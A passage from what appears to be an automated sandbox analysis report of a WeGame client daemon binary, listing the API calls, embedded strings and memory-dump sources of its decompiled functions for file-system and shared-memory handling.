                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?), ref: 00449021
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 00449157
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 00449228
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                • \tpf_ui\lua_script\, xrefs: 00449026
                                                                • [TPFUIFileSys]HandleReadFile, %ws doesn't exist, xrefs: 004492C5
                                                                • [TPFUIFileSys]HandleReadFile, Get %ws size fail, xrefs: 004491F4
                                                                • [TPFUIFileSys]HandleReadFile, Read %ws file fail, xrefs: 004491A6
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp, xrefs: 00449183, 004491D1, 00449254, 004492A2
                                                                • [TPFUIFileSys]HandleReadFile, Open %ws fail, xrefs: 00449277
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?u8to16@common@ierd_tgp@@H_prolog3U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@4@@W@std@@$?get_log_instance@base@@Application@common@ierd_tgp@@Copy_construct_fromLogger@1@$?get_workingdir_path@?instance@?send_msg@@H_prolog3_H_prolog3_catch_Umsg_base@@@std@@@V123@V?$shared_ptr@
                                                                • String ID: [TPFUIFileSys]HandleReadFile, %ws doesn't exist$[TPFUIFileSys]HandleReadFile, Get %ws size fail$[TPFUIFileSys]HandleReadFile, Open %ws fail$[TPFUIFileSys]HandleReadFile, Read %ws file fail$\tpf_ui\lua_script\$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00442851
                                                                  • Part of subcall function 004435FA: __EH_prolog3.LIBCMT ref: 00443601
                                                                  • Part of subcall function 004435FA: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,00442867,?,00000001,000000DC,004412FD,00441B02,?,Function_000411C7,?,?,00000014,00441B4E,?,00441B02), ref: 0044361F
                                                                  • Part of subcall function 004435FA: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,?,00441B02,00000008,00442867,?,00000001,000000DC,004412FD,00441B02,?,Function_000411C7,?,?), ref: 0044364C
                                                                • ?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(?,?,?,00000001,000000DC,004412FD,00441B02,?,Function_000411C7,?,?,00000014,00441B4E,?,00441B02), ref: 00442882
                                                                • ?flags@ios_base@std@@QBEHXZ.MSVCP140(?,?,00000014,00441B4E,?,00441B02), ref: 004428C6
                                                                • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 004428DF
                                                                • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,00000000,00000000), ref: 00442932
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0044295E
                                                                • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(0000002B), ref: 00442975
                                                                • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(0000002D), ref: 0044298C
                                                                • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(00000020), ref: 004429A3
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 004429B5
                                                                  • Part of subcall function 00442130: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004421B7
                                                                  • Part of subcall function 0044E126: ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,?,?,?,00441B02,?), ref: 0044E130
                                                                  • Part of subcall function 0044E126: ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,?,00441B02,?), ref: 0044E16A
                                                                  • Part of subcall function 00445421: ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(85A35C35,CF8BE2D3,?,00000000,00475A4A,000000FF,?,00442C54,?,00441B02,?,00000000), ref: 00445451
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 00442C77
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$?pptr@?$basic_streambuf@?widen@?$basic_ios@$?width@ios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_ostream@??1?$basic_ios@??1?$basic_ostream@?flags@ios_base@std@@?gptr@?$basic_streambuf@?imbue@?$basic_ios@D@std@@@1@_Unothrow_t@std@@@V32@@V?$basic_streambuf@Vlocale@2@__ehfuncinfo$??2@
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00471E78), ref: 00404E8F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00404ED7
                                                                • memset.VCRUNTIME140(?,00000000,00000030), ref: 00404F23
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memset
                                                                • String ID: VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $F@$F@
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004440C8
                                                                  • Part of subcall function 00441C6C: __EH_prolog3.LIBCMT ref: 00441C73
                                                                  • Part of subcall function 00443F20: __EH_prolog3.LIBCMT ref: 00443F27
                                                                  • Part of subcall function 00443E7F: __EH_prolog3.LIBCMT ref: 00443E86
                                                                  • Part of subcall function 00443F4B: __EH_prolog3.LIBCMT ref: 00443F52
                                                                • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON ref: 0044415E
                                                                • ?get_workingdir_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 00444167
                                                                  • Part of subcall function 0044F68F: __EH_prolog3.LIBCMT ref: 0044F696
                                                                  • Part of subcall function 0044F68F: ?reg_service@@YAXPBDV?$function@$$A6AXPBDAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z@std@@PAX@Z.COMMON(?), ref: 0044F6BD
                                                                  • Part of subcall function 0044F6D9: __EH_prolog3.LIBCMT ref: 0044F6E0
                                                                  • Part of subcall function 0044F6D9: ?reg_service@@YAXPBDV?$function@$$A6AXV?$shared_ptr@Umsg_base@@@std@@@Z@std@@PAX@Z.COMMON(?), ref: 0044F707
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$?reg_service@@Application@common@ierd_tgp@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@V?$function@$$Z@std@@$?get_workingdir_path@?instance@D@2@@std@@D@2@@std@@@H_prolog3_Umsg_base@@@std@@@V123@V?$shared_ptr@
                                                                • String ID: 0$i_service_collect_decs_files$i_service_download_tpfui_file$i_service_file_decode$i_service_get_str_md5$i_service_mount_plugin_vfs$i_service_pre_download_file$i_service_read_file$i_service_remove_file$i_service_update_redirect_file_list_to_file$i_service_update_redirect_url_map
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0044A638
                                                                • ??0Shared_mem_obj@common@ierd_tgp@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@I0_N@Z.COMMON(?,00010014,?,00000000), ref: 0044A6DF
                                                                • ?is_shared_mem_exist@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,WEB_REDIRECT_URL_MEM,00000014,0000008C,0043FE5E,?,?,00000010,0044C237,?,?), ref: 0044A755
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MEM,00000014,0000008C,0043FE5E,?,?,00000010,0044C237), ref: 0044A79F
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp,000003F3,0048BBC7,?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MEM,00000014,0000008C), ref: 0044A7E2
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(0000000F,?,?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MEM,00000014,0000008C,0043FE5E,?,?), ref: 0044A815
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,WEB_REDIRECT_URL_MEM,00000014,0000008C,0043FE5E,?,?,00000010,0044C237), ref: 0044A8AD
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420F1B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MEM,00000014,0000008C,0043FE5E,?,?,00000010,0044C237), ref: 0044A839
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                Strings
                                                                • [TPFUIFileSys][OnUpdateRedirectListToFile] create share mem failed, xrefs: 0044A8E6
                                                                • [TPFUIFileSys][OnUpdateRedirectListToFile] write share mem failed, out of size=%d , xrefs: 0044A878
                                                                • [TPFUIFileSys][OnUpdateRedirectListToFile] open mem failed, error=%d , xrefs: 0044A7E9
                                                                • WEB_REDIRECT_URL_MEM, xrefs: 0044A6A1, 0044A736
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp, xrefs: 0044A7CA, 0044A85C, 0044A8D0
                                                                • WEB_REDIRECT_URL_MEM_MUTEX, xrefs: 0044A67B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@memmove$?is_shared_mem_exist@common@ierd_tgp@@D@2@@std@@D@2@@std@@@ErrorH_prolog3H_prolog3_LastShared_mem_obj@common@ierd_tgp@@mallocstrncpy
                                                                • String ID: WEB_REDIRECT_URL_MEM$WEB_REDIRECT_URL_MEM_MUTEX$[TPFUIFileSys][OnUpdateRedirectListToFile] create share mem failed$[TPFUIFileSys][OnUpdateRedirectListToFile] open mem failed, error=%d $[TPFUIFileSys][OnUpdateRedirectListToFile] write share mem failed, out of size=%d $e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0044A927
                                                                • ??0Shared_mem_obj@common@ierd_tgp@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@I0_N@Z.COMMON(?,00010014,?,00000000), ref: 0044A9CE
                                                                • ?is_shared_mem_exist@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,WEB_REDIRECT_URL_MAP_MEM,00000018,0000008C,0043FEED,?,?,00000010,0044C24C,?,?), ref: 0044AA44
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MAP_MEM,00000018,0000008C,0043FEED,?,?,00000010,0044C24C), ref: 0044AA8E
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp,00000429,0048BBC7,?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MAP_MEM,00000018,0000008C), ref: 0044AAD1
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(0000000F,?,?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MAP_MEM,00000018,0000008C,0043FEED,?,?), ref: 0044AB04
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,WEB_REDIRECT_URL_MAP_MEM,00000018,0000008C,0043FEED,?,?,00000010,0044C24C), ref: 0044AB9C
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420F1B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MAP_MEM,00000018,0000008C,0043FEED,?,?,00000010,0044C24C), ref: 0044AB28
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                Strings
                                                                • WEB_REDIRECT_URL_MAP_MEM, xrefs: 0044A990, 0044AA25
                                                                • [TPFUIFileSys][OnUpdateRedirectListToFile] create share mem failed, xrefs: 0044ABD5
                                                                • [TPFUIFileSys][OnUpdateRedirectListToFile] write share mem failed, out of size=%d , xrefs: 0044AB67
                                                                • [TPFUIFileSys][OnUpdateSharedMemForQBlinkRedirect] open mem failed, error=%d , xrefs: 0044AAD8
                                                                • WEB_REDIRECT_URL_MAP_MEM_MUTEX_NAME, xrefs: 0044A96A
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp, xrefs: 0044AAB9, 0044AB4B, 0044ABBF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@memmove$?is_shared_mem_exist@common@ierd_tgp@@D@2@@std@@D@2@@std@@@ErrorH_prolog3H_prolog3_LastShared_mem_obj@common@ierd_tgp@@mallocstrncpy
                                                                • String ID: WEB_REDIRECT_URL_MAP_MEM$WEB_REDIRECT_URL_MAP_MEM_MUTEX_NAME$[TPFUIFileSys][OnUpdateRedirectListToFile] create share mem failed$[TPFUIFileSys][OnUpdateRedirectListToFile] write share mem failed, out of size=%d $[TPFUIFileSys][OnUpdateSharedMemForQBlinkRedirect] open mem failed, error=%d $e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp
                                                                • API String ID: 1326427004-290845240
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000,?,85A35C35,00000000,?), ref: 0041AA50
                                                                • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000), ref: 0041AAC1
                                                                • GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 0041AAEA
                                                                • memset.VCRUNTIME140(?,00000000,0000009C), ref: 0041AB4B
                                                                • memset.VCRUNTIME140(?,00000000,00000041,00000175,?,?,?,0000009C), ref: 0041AC2A
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0000009C), ref: 0041AD04
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0000009C), ref: 0041AD54
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn_waccessmemset$AttributesFile
                                                                • String ID: VFileSysBase::Create() $VFileSysBase::Create() $VFileSysBase::Create() $VFileSysBase::Create() $VFileSysBase::Create() $vfs
                                                                • API String ID: 3723302470-2140787936
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,0000009C), ref: 0041AED0
                                                                • memset.VCRUNTIME140(?,00000000,0000009C), ref: 0041AF95
                                                                  • Part of subcall function 0041DAB0: memset.VCRUNTIME140(?,00000000,0000009C,?,?,_VFS_BAK.tmp,?,85A35C35,00000000,?,?), ref: 0041DB16
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID: VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() VFS
                                                                • API String ID: 2221118986-4065571525
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memmove.VCRUNTIME140(?,null,00000004,85A35C35,?), ref: 0043C424
                                                                • memmove.VCRUNTIME140(?,00000000,?,?), ref: 0043C497
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?), ref: 0043C4DE
                                                                • memmove.VCRUNTIME140(?,0048BF6C,00000001,?), ref: 0043C5C5
                                                                • memmove.VCRUNTIME140(?,0048BF70,00000001,00000001,00000000,0048BF6C,00000001,?), ref: 0043C62D
                                                                • memmove.VCRUNTIME140(?,0048BF74,00000001,00000001,00000000,0048BF6C,00000001,?), ref: 0043C691
                                                                • memmove.VCRUNTIME140(?,0048BF78,00000001,?,?,?,?,?), ref: 0043C6FC
                                                                • memmove.VCRUNTIME140(00000000,0048BF70,00000001,?,00000000,00000000,?,00000001,00000000,0048BF78,00000001,?,?,?,?,?), ref: 0043C75C
                                                                • memmove.VCRUNTIME140(?,00000000,?,00000001,00000000,0048BF70,00000001,?,00000000,00000000,?,00000001,00000000,0048BF78,00000001,?), ref: 0043C7C8
                                                                • memmove.VCRUNTIME140(?,0048BF80,00000001,00000001,00000000,0048BF78,00000001,?,?,?,?,?), ref: 0043C881
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?), ref: 0043C8EE
                                                                Similarity
                                                                • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                                                • String ID: null
                                                                • API String ID: 2580228974-634125391
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35), ref: 00408A67
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00408B7D
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00408BDE
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00408C9E
                                                                • memset.VCRUNTIME140(?,00000008,00000030), ref: 00408D62
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,004028B2,VFSHelper::VFSHelper() ,C:\,?,?,?,?,?,00000000,00000001,00000000,00000000), ref: 00413705
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,?,?,?,?,?,?,?,00001000), ref: 00413738
                                                                  • Part of subcall function 004136E0: OutputDebugStringW.KERNEL32(?), ref: 0041376C
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00408E5D
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00408EAD
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00408ED2
                                                                Strings
                                                                • VFSHelper::CreateFile() , xrefs: 00408BF7
                                                                • VFSHelper::CreateFile() , xrefs: 00408E1D
                                                                • VFSHelper::CreateFile() , xrefs: 00408DE3
                                                                • VFSHelper::CreateFile() , xrefs: 00408D10
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memset$CriticalSection$DebugEnterLeaveOutputString
                                                                • String ID: VFSHelper::CreateFile() $VFSHelper::CreateFile() $VFSHelper::CreateFile() $VFSHelper::CreateFile()
                                                                • API String ID: 3145860676-1865619426
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 00415380: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,85A35C35,?,0041DCF1,?,85A35C35,?,?,?,?,00000000,?,?,85A35C35), ref: 00415415
                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,85A35C35), ref: 004186AF
                                                                • _invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00418700
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,85A35C35), ref: 00418944
                                                                Similarity
                                                                • API ID: _errno_invalid_parameter_noinfofreemalloc
                                                                • String ID:
                                                                • API String ID: 3981873622-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35), ref: 004082D3
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?,?), ref: 004084B2
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00408522
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040857B
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004085E8
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004087C6
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000164), ref: 0040884E
                                                                  • Part of subcall function 004037F0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040BF07,?,?,?,?,00402937,?,85A35C35,?,?,00000000), ref: 00403887
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000164), ref: 004089C1
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000164), ref: 004089E6
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave
                                                                • String ID: VFSHelper::CreateVFSFile() $_KEY)
                                                                • API String ID: 363805048-2244242188
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _CxxThrowException.VCRUNTIME140(?,0049C0FC,string pointer is null,true), ref: 00458549
                                                                • __EH_prolog3_catch.LIBCMT ref: 00458556
                                                                • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000020,?), ref: 00458587
                                                                • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140 ref: 004585B4
                                                                • ?is@?$ctype@D@std@@QBE_NFD@Z.MSVCP140(00000048,00000000), ref: 004585D0
                                                                • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140 ref: 004585E9
                                                                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000001,00000000), ref: 0045861F
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?getloc@ios_base@std@@?is@?$ctype@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@D@std@@ExceptionH_prolog3_catchThrowVlocale@2@
                                                                • String ID: string$string pointer is null$true
                                                                • API String ID: 584260398-1256233052
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045E4A1
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E4C5
                                                                  • Part of subcall function 00461579: __EH_prolog3_GS.LIBCMT ref: 00461583
                                                                  • Part of subcall function 00461579: memset.VCRUNTIME140(?,00000000,00000208,00000214,0046A105,?,85A35C35,?,?,?,?,?,0047B8A9,000000FF), ref: 004615A6
                                                                  • Part of subcall function 00461579: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004615BB
                                                                  • Part of subcall function 00461579: PathRemoveFileSpecW.SHLWAPI(?), ref: 004615C8
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • WritePrivateProfileStringW.KERNEL32(cmd_launcher_info,launcher,?,?), ref: 0045E54B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,000000B0), ref: 0045E555
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,000000B0), ref: 0045E59F
                                                                Strings
                                                                • launcher, xrefs: 0045E541
                                                                • cmd_launcher_info, xrefs: 0045E546
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 0045E581, 0045E5C3
                                                                • [main]clear_cmd_launcher_info, failed to clean launcher info, xrefs: 0045E5DA
                                                                • [main]clear_cmd_launcher_info, success to clean launcher info, xrefs: 0045E598
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
